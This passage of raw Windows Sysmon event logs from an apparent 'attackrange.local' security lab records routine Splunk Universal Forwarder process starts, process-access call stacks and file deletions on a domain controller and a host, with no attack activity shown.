Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103386Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.933{58E9C193-B22B-615A-C801-00000000FC01}4412C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103385Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.573{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E04C7D607C5FF6E5AB2DA18EC68A2092,SHA256=846244735F96BAC6F09453F763D9450A16F599980117A1C3F5E6DFA2D46F3635,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081283Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:03.025{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87D1C9E83EAE52842BEDF0A494F32C2A,SHA256=6368784E9B26C31B20572F6122E4C35D649B4E1F58020CFEC9B9DC86BAE55CE9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103384Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.479{58E9C193-B22B-615A-C701-00000000FC01}23642488C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103383Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.385{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=7233403FF7B01D6D49F0B7D8C58061AD,SHA256=8B47CD251ACD86CA969DCA38A936D6B6513548D3525335D3BA14A2473F57227F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103382Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.260{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B22B-615A-C701-00000000FC01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103381Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103380Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103379Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103378Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.260{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103377Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.260{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B22B-615A-C701-00000000FC01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103376Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.260{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B22B-615A-C701-00000000FC01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103375Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:03.261{58E9C193-B22B-615A-C701-00000000FC01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103395Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:04.589{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E63940FF54A3057EFC091F81C59F80EC,SHA256=F79E1326B8C68ACC2A807A0F95F1F2441D8FD06E2E05D9ADCED21F3912F06950,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081284Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:04.025{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7890D356A48085411B7090B627A684EA,SHA256=A06C418423AD971F0694535D719CADAA4C05BC2949A3CE2279926178E99FE98F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103394Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:04.276{58E9C193-B22B-615A-C801-00000000FC01}44126384C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103406Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:05.854{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2C00-00000000FC01}2292C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000103405Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:05.589{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C933286A3C1EA4EBFAB7A0EBEC9AACC,SHA256=11406443AE3193E2A95CD072CC00BA8FCF0B7488791E14B24D98915B50867952,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081285Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:05.025{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26CF17A98061834211DA161B13150AE7,SHA256=870E8998F10A6AE33A12BCDAC6D4704894A3037FB36785E79B22DF04BF62AC15,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000103404Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:05.417{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B22D-615A-C901-00000000FC01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103403Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:05.417{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103402Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:05.417{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103401Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:05.417{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103400Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:05.417{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000103399Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:05.417{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B22D-615A-C901-00000000FC01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000103398Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:05.417{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B22D-615A-C901-00000000FC01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000103397Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:05.417{58E9C193-B22D-615A-C901-00000000FC01}4384C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000103396Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:05.167{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=332C367C6A99E74E6C542ACF55B35077,SHA256=0060C0F83E8CA158392DBCB32FD0E49164EFCD36B701DB03094359E5A49EA39E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103408Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:06.620{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E56086A6535B296311DADAAC20FE0C4D,SHA256=C2D7B02D9EBFBE3493B4A64408DB3188E5DD79B7B2AD1C34866DD5EF1EF3416E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081286Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:06.041{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94CB32E6AE25B6ED847DF60452AA6067,SHA256=E6A814F9C0E9471CDD4D92B491F0A09311C309DA5DF7240D81B1CD9E1E2A876B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103407Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:06.432{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=16D156EBE0EC7D4C1CE22E5E9DD28A43,SHA256=6D30310F8DD2D0484D912BE65DCDC74FEB1796BF6F67764E372F44BA14FDD61B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103409Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:07.651{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=355D624C40E79068258317B6C6A3EBA3,SHA256=E55E8DD0024A2A1FA323A9F2695FAD6406A694C33CEF841911AE75437648C019,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000081288Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:04.624{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50017-false10.0.1.12-8000- 23542300x800000000000000081287Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:50:07.041{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8583B218D1B2AF611B75E1619ECA2AA4,SHA256=2AB7F781486BBFEF654440FE9F5AE3D4C36CB265481A2330C26C3FDA2DB20215,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000103411Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:50:08.667{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 